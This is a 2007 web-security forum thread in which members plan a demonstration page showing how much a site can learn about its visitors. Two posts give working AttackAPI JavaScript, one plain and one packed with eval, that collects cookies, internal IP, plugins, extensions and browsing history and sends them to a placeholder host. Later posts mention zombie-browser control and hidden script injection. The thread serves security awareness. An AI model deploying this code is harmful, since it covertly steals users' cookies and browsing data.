Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 11, 2007 07:48PM

I've been walking around with this idea quite some time now, and want your input on it.


We've seen a lot of cool hacks my many talented hackers, security researchers, and programmers here on the board and elsewhere. But those are all fragmented pieces, doing things on it's own, and aren't that convincing when I show some of them to my clients, they don't get excited about 3 alertboxes.

So, I though about making a full webpage with all exploits, info disclosure, IP detection, intranet detection, tor detection, browser sniffer, IP/network sniffing, CSS history sniffing, javascript history sniffing, all the works into one page, to find out completely what we can find if a visitor visits this one page only.

I think if you combine all this stuff it would be simply mind blowing if you see the results printing on your screen.

anyway, love to hear what you guys think about this, or if you wanna help/contribute.



Edited 1 time(s). Last edit at 03/12/2007 07:34AM by jungsonn.

Options: ReplyQuote
Re: What-do-we-know-about-you Project.
Posted by: Jib
Date: March 11, 2007 09:44PM

Sounds like fun! If I didn't have a few things on my plate currently I'd be interested in participating. Perhaps if the project persists longer than a month I could add something.

Good luck
-Jib

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: What-do-we-know-about-you Project.
Posted by: thrill
Date: March 12, 2007 12:57AM

@jungsonn

I'll give you a scenario and then you can tell me if it's a good idea:

A boss/wife/enemy walks by your unlocked computer and launch a browser. They point it to this page you have created, and it gives them a world of information. You get fired, your wife files for divorce, and your enemy has learned your browsing habbits. Now, let's say that 'accidentally' you had actually browsed a page that actually involved and/or included some extremely illegal stuff, such as bomb making methods, credit card and other personal information on millions of people, or maybe a quick browse of a kiddie porn site. Suddenly the FBI is called on you and you have absolutely no idea how anyone learned this.

But wait, eventually during your hearings it is revealed that this 'mostly erroneous' information was gathered by someone visiting www.jungsonnstudios.com, and it is revealed that what the website detected was caused by some form of spyware running on that system.

That is a huge liability. Not sure how the laws work where you live, but I am almost sure you will never find a site of that sort in the U.S.

However, this does not mean that I think it's a bad idea.. as a matter of fact I think it's a great idea, just not one the public at large is ready for.. you could make it available to your forum users, and only through your forums..

Just my .02 cents worth..

--thrill

Options: ReplyQuote
Re: What-do-we-know-about-you Project.
Date: March 12, 2007 02:36AM

I agree with the above page, but I also believe it will cause a lot of lagging on older computers.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: What-do-we-know-about-you Project.
Posted by: jungsonn
Date: March 12, 2007 07:00AM

I'm quite sure what that meant, but it really is only a page where all things come together in one giant disclosure of what we can find out while surfing this page, of corse there will be a landing page (with proper disclaimers) first where people can only access the page through login credentials presented on the landing page, and so they can browse further :)

I kinda see it as a sort of wiki but then 1 to 5 pages built and maintained by us.

If anyone is interested I setup a FTP account to http://blackdragon.jungsonnstudios.com/ where we can host the project. If you wanna join, please PM me and I give you the proper FTP login credentials.



Edited 2 time(s). Last edit at 03/12/2007 07:19AM by jungsonn.

Options: ReplyQuote
Re: What-do-we-know-about-you Project.
Posted by: SW
Date: March 12, 2007 09:05AM

thrill Wrote:
-------------------------------------------------------
> @jungsonn
>
> I'll give you a scenario and then you can tell me
> if it's a good idea:
>
> A boss/wife/enemy walks by your unlocked computer
> and launch a browser. They point it to this page
> you have created, and it gives them a world of
> information. You get fired, your wife files for
> divorce, and your enemy has learned your browsing
> habbits. Now, let's say that 'accidentally' you
> had actually browsed a page that actually involved
> and/or included some extremely illegal stuff, such
> as bomb making methods, credit card and other
> personal information on millions of people, or
> maybe a quick browse of a kiddie porn site.
> Suddenly the FBI is called on you and you have
> absolutely no idea how anyone learned this.
>
> But wait, eventually during your hearings it is
> revealed that this 'mostly erroneous' information
> was gathered by someone visiting
> www.jungsonnstudios.com, and it is revealed that
> what the website detected was caused by some form
> of spyware running on that system.
>
> That is a huge liability. Not sure how the laws
> work where you live, but I am almost sure you will
> never find a site of that sort in the U.S.
>
> However, this does not mean that I think it's a
> bad idea.. as a matter of fact I think it's a
> great idea, just not one the public at large is
> ready for.. you could make it available to your
> forum users, and only through your forums..
>
> Just my .02 cents worth..
>
> --thrill

lol Who cares? Lock your PC when you aren't around?

I don't see how it is against any laws to create a page that displays as much info it can get about you. Even if it logged the information and sold it it shouldn't be illegal.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: Rich
Date: March 12, 2007 10:24AM

This sounds like a very worthwhile project to me.

As a corporate security bod, one of my seemingly eternal frustrations is trying to get the managerial types in my company to sit up and take notice of security problems as they occasionally arise on our website, for example. Now, I can sit there and type into a web form what looks to them like a lot of gobbledegook and, hey presto, an alert box with "XSS" might pop up on the screen. But to them this is uttely unimpressive; they just don't get it, and I suppose there's really no reason why they should. So, I attempt to explain to them what's going on and, slowly but surely, they slip into the inevitable coma that results when one of those techies from the basement attempts to explain something to them :)) OK, so I have bad presentation skills!

However, a one-page, dramatic demonstration of the type you describe should certainly impress them.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 12, 2007 10:33AM

Yeah I thought also, another great thing about it is to show how dangerous JavaScript can potentially be.

Now the things is to set it up, and in which way. in this I really like to hear from all you guys.

I've been thinking about the simple things first, like every info from a surfer, ip, natted ip, referer info, country, firefox extension detection, browser fingerprint, cache history, phish example based on cache history.

With the cache history I think it would be awesome to match against a huge list of websites

and after the the more complex ones, like full blown XSS, CSRF's, DNS pinning, Tor detection, Firefox password stealing, Uploading their Boot.ini, you know all the stuff found.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: rsnake
Date: March 12, 2007 05:19PM

Heh... I've been working on a smiliar idea for a while now, but like you I haven't had much time to follow through. Very cool project and I probably have dozens of things to add. The most interesting concept for me is making it something portable though. And not requiring anything more than a <SCRIPT SRC= on a page somewhere. That's sort of what I was getting at with this:

http://ha.ckers.org/weird/env.html

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 13, 2007 07:53AM

Yep I've browsed through your /weird/ folder to look for interesting things to add. It probably will be a everlasting project.

But if anyone want to contribute stuff, you can post links, snippets, stuff, or PM/mail me for ftp access if you want to set things up yourselfs. 'm browsing through all websec blogs to find stuff but I can miss things.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 13, 2007 08:23AM

@RSnake, yeah that would be a cool option also, make it a portable one which you can load unto a flashstick and sorts.

I really think that while in progress there should be different versions of it like you said, a portable one and a fixed one, I guess it's too much to scan all things at once so maybe a few other versions of that as well. I was planning to detect all router images (kinda tough job btw) but that involves a huge scan, which might be best to launch on separete pages or with a button.

anyway much ideas :)

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: WhiteAcid
Date: March 13, 2007 08:30AM

People should be able to use this in offline mode when they are giving presentations and don't have Internet access. Even though some of the functionality is missing.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 18, 2007 02:07PM

I have a little VBScript that you could put in there.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 19, 2007 09:03AM

Mkay, can you send them me? or have a link? the following week I'll be working on it.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 19, 2007 04:03PM

I posted my VBScript proof of concept, which you can view here: http://sla.ckers.org/forum/read.php?2,8517


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: psifertex
Date: March 20, 2007 07:38PM

Jungsonn: I did something along those lines this morning for a presentation using BackFrame and AttackAPI. Not quite the same as in showing all the information leakage, but it was a quick and easy way for me to show folks how powerful javascript was via an interactive control mechanism. AttackAPI would make a great starting library for what you're talking about. It already has a ridiculous amount of useful functions built into it, it'd be easy to add some demo commands to run specific subets, or add new functions.

One hack to it might be to actually create a server-side script that would serve up a modified AttackAPI pre-populated with particular variables set from the environment variables, like RSnake's env.js

If anybody wants to see the presentation (didn't go nearly as well as I'd hoped, and I think the audio is going to be terrible in the video though I haven't imported it from the camera yet but oh well), it'll be up eventually at http://wantingseed.com/sprout/presentations

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 21, 2007 12:53AM

Cool stuff, yeh I got PDP's attack api and been browsing it a couple of times. There will be more if my time permits it. But like you said, it's nice to show all things in the right context with a lot of proof.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 06:39AM

jungsonn, this is how you do the enumeration with AttackAPI,

var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.buildQuery($A.getCookies()),
plugins: $A.getPlugins().join(','),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};

var completed = 0;

$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});

$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});

$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});

var tmr = window.setInterval(function () {
if (completed < 3)
return;

data.extensions = data.extensions.join(',');
data.states = data.states.join(',');
data.history = data.history.join(',');

$A.transport({url: 'http://somehost/collect', query: data});
window.clearInterval(tmr);
}, 1000);


btw psifertex,
check out the new ZombieMap application. It works with Carnaval for now but it is capable with working with other channel instances.

http://www.gnucitizen.org/zombiemap

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 06:40AM

this is the packed version

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 2={G:$A.J(),n:$A.o(),I:$A.H($A.q()),r:$A.E().a(\',\'),D:$A.C(),B:$A.z(),7:[],8:[],9:[]};d 5=0;$A.x({f:4(6){2.7.e(6.g)},b:4(){5+=1}});$A.y({f:4(6){2.8.e(6.g)},b:4(){5+=1}});$A.j({f:4(c){2.9.e(c)},b:4(){5+=1}});d h=i.m(4(){p(5<3)u;2.7=2.7.a(\',\');2.8=2.8.a(\',\');2.9=2.9.a(\',\');$A.l({c:\'s://t/w\',k:2});i.F(h)},v);',46,46,'||data||function|completed|signature|extensions|states|history|join|oncomplete|url|var|push|onfound|name|tmr|window|scanHistory|query|transport|setInterval|platform|getPlatform|if|getCookies|plugins|http|somehost|return|1000|collect|scanExtensions|scanStates|getInternalHostname||hostname|getInternalIP|ip|getPlugins|clearInterval|agent|buildQuery|cookies|getAgent'.split('|'),0,{}))

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 08:21AM

Something that may be cool and impressive to show to people that don't really know web sec is playing with fired JS events.
You need a persistant XSS in the pages (seems not realistic but well, it's for demo) and then, you can launch your events with timers to naviguate on that site...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Date: March 21, 2007 09:18AM

oooh ok, yes I see what you mean. but you can do the same thing with the new AttackAPI without the need to fire events. Actually you can browse pages from your side that will result into the other side (the zombie). But I get your point. Sort of a replay attack :). Actually, this is a good idea.

There are several frameworks out there that allow you to record the actions you do on the site. After you finish recording, the application generates a simple JavaScript file. Now you can include this file as part of your XSS payload. This way you don't have to write the stuff yourself, you are merely replaying an attack.

Of course, this is a lot complicated then it sounds.

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 10:41AM

A simple version of this wouldn't not be really complicated; doing this on a real website is the problem :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: jungsonn
Date: March 21, 2007 04:46PM

I don't see the problem with persistent XSS on a subdomain of my site. That's exactly what I was planning, Maybe also a few forms to fiddle around. a lot of stuff to fire events and reall XSS. maybe not on the same page, but a another page. I don't know yet.

But keep the ideas rolling in though! :)

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: nEUrOO
Date: March 21, 2007 09:29PM

Oh, I meant that it is tough to find a real website where you can have a persistent XSS on multiple page where you can really play with fired events for navigation etc. :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Black Dragon Project. aka: what-do-we-know-about-you project
Posted by: psifertex
Date: March 22, 2007 09:00PM

Yeah, pdp, yeah, I saw that. Great stuff. I'm tempted to start including hidden attackapi libraries on some of the websites I've got and monitoring them via the zombiemap. Could be fun. Could be dangerous too since it allows someone to do anything they want to my websites were I put them. ;-)

Or I suppose I could run my own copy of the zombie map somewhere else instead of using carnival.

Options: ReplyQuote


Sorry, only registered users may post in this forum.